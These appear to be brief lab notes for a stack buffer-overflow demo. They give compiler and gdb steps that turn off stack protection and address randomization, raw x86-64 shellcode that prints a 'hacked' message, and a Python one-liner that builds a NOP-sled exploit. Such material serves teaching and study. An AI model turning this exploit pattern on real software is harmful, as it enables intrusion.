Noop Sled Demo

[1] Compile as follows:
g++ -g -z execstack -fno-stack-protector attackMe.C -o attackMe


[2] In gdb,
set disable-randomization on

[3] Shellcode for "You've been hacked!" using SYSCALL, length of 69 bytes:
\xeb\x29\x48\x31\xdb\xb3\x0e\x48\x31\xf6\x5e\x48\x31\xc0\xb0\x01\x48\x31\xff\x40\xb7\x01\x48\x31\xd2\xb2\x15\x0f\x05\xfe\xcb\x75\xea\x48\x31\xc0\xb0\x3c\x48\x31\xff\x0f\x05\xe8\xd2\xff\xff\xff\x59\x6f\x75\x27\x76\x65\x5f\x62\x65\x65\x6e\x5f\x68\x61\x63\x6b\x65\x64\x21\x0a\x0d

[4] Using Python to serve the shellcode
r "$(python -c 'print "\x90" * 51 + "\xeb\x29\x48\x31\xdb\xb3\x0e\x48\x31\xf6\x5e\x48\x31\xc0\xb0\x01\x48\x31\xff\x40\xb7\x01\x48\x31\xd2\xb2\x15\x0f\x05\xfe\xcb\x75\xea\x48\x31\xc0\xb0\x3c\x48\x31\xff\x0f\x05\xe8\xd2\xff\xff\xff\x59\x6f\x75\x27\x76\x65\x5f\x62\x65\x65\x6e\x5f\x68\x61\x63\x6b\x65\x64\x21\x0a\x0d" + "\x20\xe0\xff\xff\xff\x7f"')"

